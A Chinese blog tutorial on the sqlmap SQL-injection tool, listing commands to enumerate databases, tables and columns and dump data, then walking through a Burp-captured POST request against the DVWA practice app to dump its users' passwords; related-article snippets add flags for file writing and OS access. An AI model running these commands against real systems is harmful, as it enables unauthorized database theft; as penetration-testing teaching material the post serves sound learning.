sqlmap的简单语法应用与实战操作

最新推荐文章于 2024-07-15 15:39:35 发布
最新推荐文章于 2024-07-15 15:39:35 发布
阅读量484 收藏 2
点赞数
文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46163639/article/details/106320814
版权

利用sqlmap注入

原理

一种开源的渗透测试工具,可以自动检测和利用 Sql 注入漏洞以及接入该数据库的服务器。
它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令,使用 Sqlmap 工具将极大的简化我们的测试工作量。
Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞。

接下来是语法:

sqlmap.py -u [" “] --dbs 查询所有的数据库名
sqlmap.py -u [” “] --current-db 查询所在数据库名
sqlmap.py -u [” “] --current-user 获取当前用户名称
sqlmap.py -u [” “] -D [‘数据库名’] --tables 列出表名
sqlmap.py -u [” “] -D [‘数据库名’] -T [‘表名’] --columns 列出(列名)字段
sqlmap.py -u [” "] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1’,’…’] --dump 获取字段内容

另外一种拓展变形:

用sqlmap跑post型注入:
语法:
sqlmap.py -r c:\python\1.txt

首先,开burp截包。

输入1,提交。
可以看见,burp已经把id获取到了
copy to file,保存为txt文件。
在这里插入图片描述

例如:

用sqlmap跑post型注入:
语法:
sqlmap.py -r c:\python\1.txt
在这里插入图片描述
可以看到,存在的注入类型(布尔盲注和时间盲注)和payload和数据库类型和版本都给你报出来了。
然后接下来的方式就跟跑GET的方法基本一致。

接下来是演示:

接上面的爆出的注入类型继续:

爆数据库名:
sqlmap.py -r c:\Python27\1.txt --current-db
在这里插入图片描述

爆表名:sqlmap.py -r c:\Python27\1.txt -D dvwa --tables
在这里插入图片描述

爆字段(列名):sqlmap.py -r c:\Python27\1.txt -D dvwa -T users --columns
在这里插入图片描述

爆数据:sqlmap.py -r c:\Python27\1.txt -D dvwa -T users -C user,password --dump
在这里插入图片描述

Flyingnets 飞络
关注
SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)
Until_U的博客
07-05 4531
1 项目实验环境 测试渗透机:kali_linux-2020 链接:https://pan.baidu.com/s/1apN96nIcs1Fyx8YmFs24Xg 提取码:32ve 目标靶机:owasp_Broken_Web_Apps 链接:https://pan.baidu.com/s/1CMJ2aERmDGlXXkhUmjDmtA 提取码:9zsj 2 SQL注入概述 2.1 SQL注入简介 在owasp年度top 10安全问题中,注入高居榜首。SQL注入攻击指的是通过构建特殊..
红队专题-渗透工具-sqlmap
热门推荐
aming小老弟
01-29 2万+
目标对象 请求 优化 —线程。
sqlmap语法
X_Walter的博客
11-10 1309
1、基础语法 sqlmap -u url --users #查看数据库所有用户 sqlmap -u url --passwords #查看数据库所有用户密码 sqlmap -u url #判断注入点 sqlmap -u url --current-dbs #查看当前所有数据库 sqlmap -u url --current-user #查看数据库当前的用户 sqlmap -u url --is-dba #判断当前用户是否有管理员权限 sqlmap -u url --roles #列出数据库所有管理员角.
SQLMAP 语法
LYSM
05-08 444
扫描指定URL sqlmap -u "网站URL" --cookie="COOKIE值"
SQLMAP教程,零基础入门到精通,一篇就够了!
最新发布
程序员阿飘 的博客
07-15 1465
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
sqlmap基本语法
m0_46315342的博客
05-31 410
推荐参考博客:https://blog.csdn.net/gmnet/article/details/7894834 -u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume) –column
sqlmap语法介绍
永远是少年
07-15 401
今天继续给大家介绍Linux运维相关知识,本文主要内容是sqlmap语法介绍。 一、sqlmap简介 二、sqlmap常用参数 三、sqlmap常用语句
sqlmap使用语法基础
san3144393495的博客
04-23 556
-file-write #写入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;--dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)p=2 --is-dba -U 用户名 -v 1。--dump -T "" -D "" --start 2 --top 4 #列出指定数据库的表的2-4字段的数据。
深入浅出Mybatis技术原理与实战
qq_36789243的博客
08-27 1330
文章目录Mybatis简介传统的JDBC编程Hibernate与MybatisMybatis入门SqlSessionFactorySqlSession映射器MapperMybatis组件的生命周期配置propertiestypeAliasestypeHandler自定义typeHandler枚举类型typeHandler自定义枚举类typeHandlerobjectFactoryenvironments数据库事务映射器select元素自动映射传递多个参数使用resultMap映射结果集insert元素主键.
sqlmap原理及常用指令
weixin_43873557的博客
02-05 1159
SQL 注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL 注入分类 数字型注入 当输入的参数为整型时,则有可能存在数字型注入漏洞。 假设存在一条 URL 为:HTTP://www.aaa.com/test.php?id=1 可以对后台的 SQL 语句猜测为: SELECT * FROM table WHERE id=1
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
2301_82242964的博客
05-04 651
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
SQL渗透与防御——(六)sqlmap语法
FisrtBqy的博客
03-10 574
sqlmap语法1 选项:2 目标:3 请求:4 优化:5 注入:6 检测:7 Techniques:8 指纹:9 枚举:10 暴力破解:11 用户定义函数注入:12 文件系统访问:13 操作系统访问:14 Windows注册表访问:15 通用:16 杂项: 1 选项: -h, --help #显示基本帮助信息并退出 -hh #显示高级帮助信息并退出 --version #显示程序的版本
sqlmap用法详解
hirak0的博客
09-07 1万+
输出详细等级 选项:-v 该选项用于设置输出信息的详细等级,共有七个级别。默认级别为 1,输出包括普通信息,警告,错误,关键信息和 Python 出错回遡信息(如果有的话)。 0:只输出 Python 出错回溯信息,错误和关键信息。 1:增加输出普通信息和警告信息。 2:增加输出调试信息。 3:增加输出已注入的 payloads。 4:增加输出 HTTP 请求。 5:增加输出 HTTP 响应头 6:增加输出 HTTP 响应内容。 使用等级 2 能更好地了解 sqlmap 内部实现了什么,特别是在检测阶段
Sqlmap基础用法
wang720521的博客
01-28 4275
SQLmap 用法 用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库
sqlmap基本用法
WANGtesting的专栏
05-14 1407
sqlmap+dvwa注入的基本使用
SQLmap常用命令/使用教程
wangyuxiang946的博客
08-08 1万+
SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库 检测位置 -u -- 指定url(GET请求) -p -- 指定参数(url包含多个参数时,指定参数) --data= -- 指定POST请求参数 --cookie -- 指定cookie参数 -r -- 从文件中加载HTTP请求(在需要检测的Header后面加上*) 获取数据 --dbs -- 获取数据库名 --tables -- 获取表名 --columns -- 获取字段名 --du
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了_sqlmap使用教程
2401_84182758的博客
04-12 1108
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
超详细SQLMap使用攻略及技巧分享
白昼小丑的博客
03-28 959
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站:http://sqlmap.org/, 下载地址:https://github.com/sqlmapproject/sqlmap/zipball/master 演示视
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值